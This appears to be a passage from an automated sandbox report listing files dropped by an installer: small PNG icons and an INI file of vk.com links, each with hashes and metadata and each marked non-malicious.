                                                                                                                                                                                                                                                          SHA-512:AF4D0182BE380DDD3972D905AE8800AA5720DD42FE62504090BBC5BF929771844C7F8DE7594851A562ED982FE3DD4EDA7B07D7177DD037C74A5D0EA510E7A863
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r....CIDAT8Oc`...=./..'........x1H.^.~......p........2...b>..@..4o.u......?.j......Wt...2....\.......'./.|....`z...O..G. .0.............+{v.]Q....$...._.....x.y...@,...?~c...S....-^..... .~.....~.....?~.....s.C...o.....i..'....4..y...b.Y.s...Uo._....u.Pb..r.8..@..6d.....(.{..A... v..(iB.h..... ..................5BJ.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):337
                                                                                                                                                                                                                                                          Entropy (8bit):6.603752167197913
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3te+/CG3J1R7/1JrZywu9ym9mmAivY6Ppmj/jp:6v/78/nfCG3JHVywuUm9mmAiQ6Bmh
                                                                                                                                                                                                                                                          MD5:58280774747B0A7F0CA8B29DACA0B917
                                                                                                                                                                                                                                                          SHA1:0BEEDF45E1CC739DAD3886AD1532A05BDFD2A3E8
                                                                                                                                                                                                                                                          SHA-256:A7FA8ED622AECB52E7FDB363B32CC44C3A6FF5837FF78917DD177DBBE15B7DD6
                                                                                                                                                                                                                                                          SHA-512:21FCDC686E3B700753E975C7A78884E7C0EBAF0ADABF13152B199B97F7F1F6F8FBAF1295ABDA7E2FA5D81683894EB280C1AA92E6695AEA56A289E9F17AE4095E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8Oc.....?k1Y......g...s.!.......h...,.........3x..k`>.F....`.P.S....7..O`.A4.}'.]....`..`.@4Lq..`.@4^.`....X.!..r@b."r."..l.r.P/.T..$9!..].//XG...4.|.........4..'h.H...........CK.Tl.u....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):296
                                                                                                                                                                                                                                                          Entropy (8bit):6.500966192845998
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3teBQFMnlqsTJee5uicbPfZSyxX0GUd/eup:6v/78/nIQFMnkyf54rfsrpz
                                                                                                                                                                                                                                                          MD5:1374A978134A935973CAF3CD4BFD5DD6
                                                                                                                                                                                                                                                          SHA1:3A24FBE3ACDA81875702DE3DC013EA3C3B717AB5
                                                                                                                                                                                                                                                          SHA-256:DF28F5437300E6BF466FED1E74E785D4BD205ADDB1AACCBB37F51E7FD79B9C13
                                                                                                                                                                                                                                                          SHA-512:076C7993D4547042FF31C8560FC3C0A699C940CAC85668D9622E6B5F26F26C90DB5E395A1AEC0EEACDF842996A5D734FBCC310638C0D3E4C97E328419ED4000B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8Oc`.&...<...I.....4N.6.?).d...7...2..{..YC...a5.b...h....A..GX1H...(6...d...p....$.^.........w.<.....@..]XJ....K...(.....X^d.2......R..G... .k..^.j....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):341
                                                                                                                                                                                                                                                          Entropy (8bit):6.666726809754627
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3teHAFYqNQHvot6aM1nqJyVlMt+OxMp:6v/78/noAF2vonMDHs+Ox+
                                                                                                                                                                                                                                                          MD5:7D35A55137029755B25CA2B25F54D7AE
                                                                                                                                                                                                                                                          SHA1:22C1FA56B55C250889EB7B2AECE02803F34E4D43
                                                                                                                                                                                                                                                          SHA-256:07256C3BA7DF49D4258054B35AFD01555CC25BD32D19DA852F1077C5B298A8CD
                                                                                                                                                                                                                                                          SHA-512:2FFE767C9FCE4BC994460E7071579B6DF94A650FF9E3F9CC0538D599CD40178304302583C826F9CF39BAD2F160433E264BD2265DB17D016FA60158EF34461D0A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8Oc`..L.........@...K.....?..O....Y.e...m./...7.....A. .Y-V.@.a......I6...p. C@|.!X].jZ... ........n....A|......l...)|py5..77...X.....p.a....^@.@........x.@Jz...$..^......7.23.....y..?..k.......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):479
                                                                                                                                                                                                                                                          Entropy (8bit):7.089593114616156
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/78/nYc+5kz1ODz/QkR2gWWQQNjWPsiVY:SezqjQW2gfNjIsf
                                                                                                                                                                                                                                                          MD5:011D15EB16A43A3A209EF0AA0AA18EEE
                                                                                                                                                                                                                                                          SHA1:AA2B6FA0994415F1F8375FDA46EE3F3336777D9F
                                                                                                                                                                                                                                                          SHA-256:12DC59580F6AD444E19F24260219FA0B9FDDC1B5873C1F9361C2063A8DC1A4E5
                                                                                                                                                                                                                                                          SHA-512:81D9B1576636754E746523C032D822BB458D2F0FFC3632A132D3C64F32637888C5ADED498060D6020D17CC989DE96D639F8FDAA569F338ACCD810622D0C3C58B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r....NIDAT8Oc`.......w...Q.+.....?>..r)5k...._....EG.G.-'.-...O.Z...p.....U..3.+m...+O..0w.....s.3.=y...Oa...O.......Z..5$.`...K.....z.........^...Y.6`.zH@.......#....ir...=.....E#(-....Z6.o...l....I2 .l....G..LZ|.....8{.....;f.@.D.a C..{...../l..?.`..fX.....4...........[g.C..9)...)......w........;CP3.. . }p.....'.......{.........IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):468
                                                                                                                                                                                                                                                          Entropy (8bit):7.111349425204145
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3tezZiBETckBgamBUuzzCg5z7yDALRIjfq1iMrjWTa/IUlqauE:6v/78/nawkdmBUKf5zaIybM/WqTsY
                                                                                                                                                                                                                                                          MD5:37DA94ECD734F687EF2BD6B876BA3918
                                                                                                                                                                                                                                                          SHA1:20F07BFA0FCF04B900F5E78B503B9E7597BB652D
                                                                                                                                                                                                                                                          SHA-256:310373B5A0CA520244BBC8C21837F356781DE404EBEEAD88A44AC149B4B3EFE1
                                                                                                                                                                                                                                                          SHA-512:AF4D0182BE380DDD3972D905AE8800AA5720DD42FE62504090BBC5BF929771844C7F8DE7594851A562ED982FE3DD4EDA7B07D7177DD037C74A5D0EA510E7A863
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r....CIDAT8Oc`...=./..'........x1H.^.~......p........2...b>..@..4o.u......?.j......Wt...2....\.......'./.|....`z...O..G. .0.............+{v.]Q....$...._.....x.y...@,...?~c...S....-^..... .~.....~.....?~.....s.C...o.....i..'....4..y...b.Y.s...Uo._....u.Pb..r.8..@..6d.....(.{..A... v..(iB.h..... ..................5BJ.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):468
                                                                                                                                                                                                                                                          Entropy (8bit):7.111349425204145
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3tezZiBETckBgamBUuzzCg5z7yDALRIjfq1iMrjWTa/IUlqauE:6v/78/nawkdmBUKf5zaIybM/WqTsY
                                                                                                                                                                                                                                                          MD5:37DA94ECD734F687EF2BD6B876BA3918
                                                                                                                                                                                                                                                          SHA1:20F07BFA0FCF04B900F5E78B503B9E7597BB652D
                                                                                                                                                                                                                                                          SHA-256:310373B5A0CA520244BBC8C21837F356781DE404EBEEAD88A44AC149B4B3EFE1
                                                                                                                                                                                                                                                          SHA-512:AF4D0182BE380DDD3972D905AE8800AA5720DD42FE62504090BBC5BF929771844C7F8DE7594851A562ED982FE3DD4EDA7B07D7177DD037C74A5D0EA510E7A863
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r....CIDAT8Oc`...=./..'........x1H.^.~......p........2...b>..@..4o.u......?.j......Wt...2....\.......'./.|....`z...O..G. .0.............+{v.]Q....$...._.....x.y...@,...?~c...S....-^..... .~.....~.....?~.....s.C...o.....i..'....4..y...b.Y.s...Uo._....u.Pb..r.8..@..6d.....(.{..A... v..(iB.h..... ..................5BJ.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):341
                                                                                                                                                                                                                                                          Entropy (8bit):6.666726809754627
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3teHAFYqNQHvot6aM1nqJyVlMt+OxMp:6v/78/noAF2vonMDHs+Ox+
                                                                                                                                                                                                                                                          MD5:7D35A55137029755B25CA2B25F54D7AE
                                                                                                                                                                                                                                                          SHA1:22C1FA56B55C250889EB7B2AECE02803F34E4D43
                                                                                                                                                                                                                                                          SHA-256:07256C3BA7DF49D4258054B35AFD01555CC25BD32D19DA852F1077C5B298A8CD
                                                                                                                                                                                                                                                          SHA-512:2FFE767C9FCE4BC994460E7071579B6DF94A650FF9E3F9CC0538D599CD40178304302583C826F9CF39BAD2F160433E264BD2265DB17D016FA60158EF34461D0A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8Oc`..L.........@...K.....?..O....Y.e...m./...7.....A. .Y-V.@.a......I6...p. C@|.!X].jZ... ........n....A|......l...)|py5..77...X.....p.a....^@.@........x.@Jz...$..^......7.23.....y..?..k.......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):479
                                                                                                                                                                                                                                                          Entropy (8bit):7.089593114616156
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/78/nYc+5kz1ODz/QkR2gWWQQNjWPsiVY:SezqjQW2gfNjIsf
                                                                                                                                                                                                                                                          MD5:011D15EB16A43A3A209EF0AA0AA18EEE
                                                                                                                                                                                                                                                          SHA1:AA2B6FA0994415F1F8375FDA46EE3F3336777D9F
                                                                                                                                                                                                                                                          SHA-256:12DC59580F6AD444E19F24260219FA0B9FDDC1B5873C1F9361C2063A8DC1A4E5
                                                                                                                                                                                                                                                          SHA-512:81D9B1576636754E746523C032D822BB458D2F0FFC3632A132D3C64F32637888C5ADED498060D6020D17CC989DE96D639F8FDAA569F338ACCD810622D0C3C58B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r....NIDAT8Oc`.......w...Q.+.....?>..r)5k...._....EG.G.-'.-...O.Z...p.....U..3.+m...+O..0w.....s.3.=y...Oa...O.......Z..5$.`...K.....z.........^...Y.6`.zH@.......#....ir...=.....E#(-....Z6.o...l....I2 .l....G..LZ|.....8{.....;f.@.D.a C..{...../l..?.`..fX.....4...........[g.C..9)...)......w........;CP3.. . }p.....'.......{.........IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):337
                                                                                                                                                                                                                                                          Entropy (8bit):6.603752167197913
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3te+/CG3J1R7/1JrZywu9ym9mmAivY6Ppmj/jp:6v/78/nfCG3JHVywuUm9mmAiQ6Bmh
                                                                                                                                                                                                                                                          MD5:58280774747B0A7F0CA8B29DACA0B917
                                                                                                                                                                                                                                                          SHA1:0BEEDF45E1CC739DAD3886AD1532A05BDFD2A3E8
                                                                                                                                                                                                                                                          SHA-256:A7FA8ED622AECB52E7FDB363B32CC44C3A6FF5837FF78917DD177DBBE15B7DD6
                                                                                                                                                                                                                                                          SHA-512:21FCDC686E3B700753E975C7A78884E7C0EBAF0ADABF13152B199B97F7F1F6F8FBAF1295ABDA7E2FA5D81683894EB280C1AA92E6695AEA56A289E9F17AE4095E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8Oc.....?k1Y......g...s.!.......h...,.........3x..k`>.F....`.P.S....7..O`.A4.}'.]....`..`.@4Lq..`.@4^.`....X.!..r@b."r."..l.r.P/.T..$9!..].//XG...4.|.........4..'h.H...........CK.Tl.u....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):296
                                                                                                                                                                                                                                                          Entropy (8bit):6.500966192845998
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3teBQFMnlqsTJee5uicbPfZSyxX0GUd/eup:6v/78/nIQFMnkyf54rfsrpz
                                                                                                                                                                                                                                                          MD5:1374A978134A935973CAF3CD4BFD5DD6
                                                                                                                                                                                                                                                          SHA1:3A24FBE3ACDA81875702DE3DC013EA3C3B717AB5
                                                                                                                                                                                                                                                          SHA-256:DF28F5437300E6BF466FED1E74E785D4BD205ADDB1AACCBB37F51E7FD79B9C13
                                                                                                                                                                                                                                                          SHA-512:076C7993D4547042FF31C8560FC3C0A699C940CAC85668D9622E6B5F26F26C90DB5E395A1AEC0EEACDF842996A5D734FBCC310638C0D3E4C97E328419ED4000B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8Oc`.&...<...I.....4N.6.?).d...7...2..{..YC...a5.b...h....A..GX1H...(6...d...p....$.^.........w.<.....@..]XJ....K...(.....X^d.2......R..G... .k..^.j....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Generic INItialization configuration [Friends]
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):162
                                                                                                                                                                                                                                                          Entropy (8bit):4.685024049706956
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:QRUXdrx9reugHovdMTaW4/d1amqKL946WImgK4/d1amqKLrjM+n:KOdrDeaMB4FQ7l9NgK4/dQ7r+n
                                                                                                                                                                                                                                                          MD5:CFA4D0ED34E826F2A6A243ADCE69C272
                                                                                                                                                                                                                                                          SHA1:F4C7EA1EFC0FD6A61706120C4BF66452418805EC
                                                                                                                                                                                                                                                          SHA-256:9202BF8E81E98F492F5610A2F67E6CF8882890484F0F8E7B43EE9DA2D2372B70
                                                                                                                                                                                                                                                          SHA-512:66663614DCBBC9E62E91A2B34B1518AD3EB7C78C39F8DA9523F1D17A7CBC3000EAC7F7373A698BF9F76A3B395EB857393225E4E77216EBEE06C83CF0D871FF88
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:[Messages]..ID="vk.com/im"..[Friends]..ID="vk.com/friends"..[Notifications]..ID="vk.com/feed?section=notifications"..[Replies]..ID="vk.com/feed?section=replies"..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):468
                                                                                                                                                                                                                                                          Entropy (8bit):7.111349425204145
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3tezZiBETckBgamBUuzzCg5z7yDALRIjfq1iMrjWTa/IUlqauE:6v/78/nawkdmBUKf5zaIybM/WqTsY
                                                                                                                                                                                                                                                          MD5:37DA94ECD734F687EF2BD6B876BA3918
                                                                                                                                                                                                                                                          SHA1:20F07BFA0FCF04B900F5E78B503B9E7597BB652D
                                                                                                                                                                                                                                                          SHA-256:310373B5A0CA520244BBC8C21837F356781DE404EBEEAD88A44AC149B4B3EFE1
                                                                                                                                                                                                                                                          SHA-512:AF4D0182BE380DDD3972D905AE8800AA5720DD42FE62504090BBC5BF929771844C7F8DE7594851A562ED982FE3DD4EDA7B07D7177DD037C74A5D0EA510E7A863
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r....CIDAT8Oc`...=./..'........x1H.^.~......p........2...b>..@..4o.u......?.j......Wt...2....\.......'./.|....`z...O..G. .0.............+{v.]Q....$...._.....x.y...@,...?~c...S....-^..... .~.....~.....?~.....s.C...o.....i..'....4..y...b.Y.s...Uo._....u.Pb..r.8..@..6d.....(.{..A... v..(iB.h..... ..................5BJ.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):362
                                                                                                                                                                                                                                                          Entropy (8bit):6.744489136613283
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPOtBUswMR/C+wZA3teVVIqGKvSdmD4lK6mj9I4OPDWwnqtzzfQ27r8aCwt2:6v/7K2sb/nK5GUonx4NMqtzzIorTtxdu
                                                                                                                                                                                                                                                          MD5:0BAB4FC0FAACC30AC714DB34333BAA54
                                                                                                                                                                                                                                                          SHA1:C5AA05973E3267D60F2C927AB67B16FCE8929118
                                                                                                                                                                                                                                                          SHA-256:4E79FBF438C1F6B197D15B08619BCCF862E7076D11C75D0B9CE3007711D94347
                                                                                                                                                                                                                                                          SHA-512:06B09980DB26DA14FB0E80EC2831A9B377112E97EAEAFF967221170A5E3D7FE70B940CCE934629CE0451D41457F1705D76B1E64181D8A9D062FA0C4BD77E34AE
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR..............,.....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8Oc`.6..Z......7c...x....>|.Aj@j.......`....;...F6.l.....@...A....R.3....g..f.......@.+p........R.....i.:r...Hid3(.Q.....6.G...*.#...>!`...j.r... K@.a...?r4"kD.Z..h......x..B.^......D.....`.@5..n....5.r.>y.E.".........IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):288
                                                                                                                                                                                                                                                          Entropy (8bit):6.530333940085824
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3teNpjvb61Qo2SAo+yeZG7q5Vp:6v/78/n+jDqQmEyeZ8g
                                                                                                                                                                                                                                                          MD5:EE2EC82FDFACF590ED0211B44987C617
                                                                                                                                                                                                                                                          SHA1:71F0AFC24952BB5C2F334C56F801470176BCCEC2
                                                                                                                                                                                                                                                          SHA-256:F8199692B7CE8D0C77D9DED524F679D64FF7723421345425B431EE933868AAC0
                                                                                                                                                                                                                                                          SHA-512:220A8C913FED060F38FCA7835D508D8D88531EF940532E8173257741433ED7FB21223CD2EE1EDDB5E770BD44AA632F8B043481CED038167901D65C74A6CC6192
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8Oc`...:.?...?....8H...`C.*\.a....V.1H.........>...ge..|...w..'...A.... 5-..`..U.}R.I. }.......y..).5..7.s.....u...?.p...t>..$.R.l ..[aR.O......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):362
                                                                                                                                                                                                                                                          Entropy (8bit):6.744489136613283
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPOtBUswMR/C+wZA3teVVIqGKvSdmD4lK6mj9I4OPDWwnqtzzfQ27r8aCwt2:6v/7K2sb/nK5GUonx4NMqtzzIorTtxdu
                                                                                                                                                                                                                                                          MD5:0BAB4FC0FAACC30AC714DB34333BAA54
                                                                                                                                                                                                                                                          SHA1:C5AA05973E3267D60F2C927AB67B16FCE8929118
                                                                                                                                                                                                                                                          SHA-256:4E79FBF438C1F6B197D15B08619BCCF862E7076D11C75D0B9CE3007711D94347
                                                                                                                                                                                                                                                          SHA-512:06B09980DB26DA14FB0E80EC2831A9B377112E97EAEAFF967221170A5E3D7FE70B940CCE934629CE0451D41457F1705D76B1E64181D8A9D062FA0C4BD77E34AE
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR..............,.....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8Oc`.6..Z......7c...x....>|.Aj@j.......`....;...F6.l.....@...A....R.3....g..f.......@.+p........R.....i.:r...Hid3(.Q.....6.G...*.#...>!`...j.r... K@.a...?r4"kD.Z..h......x..B.^......D.....`.@5..n....5.r.>y.E.".........IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):362
                                                                                                                                                                                                                                                          Entropy (8bit):6.744489136613283
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPOtBUswMR/C+wZA3teVVIqGKvSdmD4lK6mj9I4OPDWwnqtzzfQ27r8aCwt2:6v/7K2sb/nK5GUonx4NMqtzzIorTtxdu
                                                                                                                                                                                                                                                          MD5:0BAB4FC0FAACC30AC714DB34333BAA54
                                                                                                                                                                                                                                                          SHA1:C5AA05973E3267D60F2C927AB67B16FCE8929118
                                                                                                                                                                                                                                                          SHA-256:4E79FBF438C1F6B197D15B08619BCCF862E7076D11C75D0B9CE3007711D94347
                                                                                                                                                                                                                                                          SHA-512:06B09980DB26DA14FB0E80EC2831A9B377112E97EAEAFF967221170A5E3D7FE70B940CCE934629CE0451D41457F1705D76B1E64181D8A9D062FA0C4BD77E34AE
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR..............,.....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8Oc`.6..Z......7c...x....>|.Aj@j.......`....;...F6.l.....@...A....R.3....g..f.......@.+p........R.....i.:r...Hid3(.Q.....6.G...*.#...>!`...j.r... K@.a...?r4"kD.Z..h......x..B.^......D.....`.@5..n....5.r.>y.E.".........IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):468
                                                                                                                                                                                                                                                          Entropy (8bit):7.111349425204145
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3tezZiBETckBgamBUuzzCg5z7yDALRIjfq1iMrjWTa/IUlqauE:6v/78/nawkdmBUKf5zaIybM/WqTsY
                                                                                                                                                                                                                                                          MD5:37DA94ECD734F687EF2BD6B876BA3918
                                                                                                                                                                                                                                                          SHA1:20F07BFA0FCF04B900F5E78B503B9E7597BB652D
                                                                                                                                                                                                                                                          SHA-256:310373B5A0CA520244BBC8C21837F356781DE404EBEEAD88A44AC149B4B3EFE1
                                                                                                                                                                                                                                                          SHA-512:AF4D0182BE380DDD3972D905AE8800AA5720DD42FE62504090BBC5BF929771844C7F8DE7594851A562ED982FE3DD4EDA7B07D7177DD037C74A5D0EA510E7A863
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r....CIDAT8Oc`...=./..'........x1H.^.~......p........2...b>..@..4o.u......?.j......Wt...2....\.......'./.|....`z...O..G. .0.............+{v.]Q....$...._.....x.y...@,...?~c...S....-^..... .~.....~.....?~.....s.C...o.....i..'....4..y...b.Y.s...Uo._....u.Pb..r.8..@..6d.....(.{..A... v..(iB.h..... ..................5BJ.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
